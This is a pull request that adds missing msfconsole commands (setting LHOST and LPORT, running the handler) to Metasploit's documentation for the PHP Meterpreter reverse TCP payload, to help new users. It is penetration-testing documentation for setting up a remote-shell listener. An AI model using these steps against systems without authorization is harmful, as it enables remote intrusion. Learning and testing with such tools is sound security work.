### PR TITLE
Update php reverse_tcp instructions

### DIFF
--- a/documentation/modules/payload/php/meterpreter/reverse_tcp.md
+++ b/documentation/modules/payload/php/meterpreter/reverse_tcp.md
@@ -22,6 +22,12 @@ msf > use multi/handler
 msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
 PAYLOAD => php/meterpreter/reverse_tcp
 msf exploit(handler) > set LHOST [IP]
+LHOST => [IP]
+msf exploit(handler) > set LPORT 4444
+LPORT => 4444
+msf exploit(handler) > exploit
+
+[*] Started reverse TCP handler on [IP]
   ```
   
 ## Important Basic Commands


### PR DESCRIPTION
Added the full set of commands to set up a listener to the php reverse_tcp instructions readme.md. This should make it easier for first time users. It was missing the final 'exploit' command. 

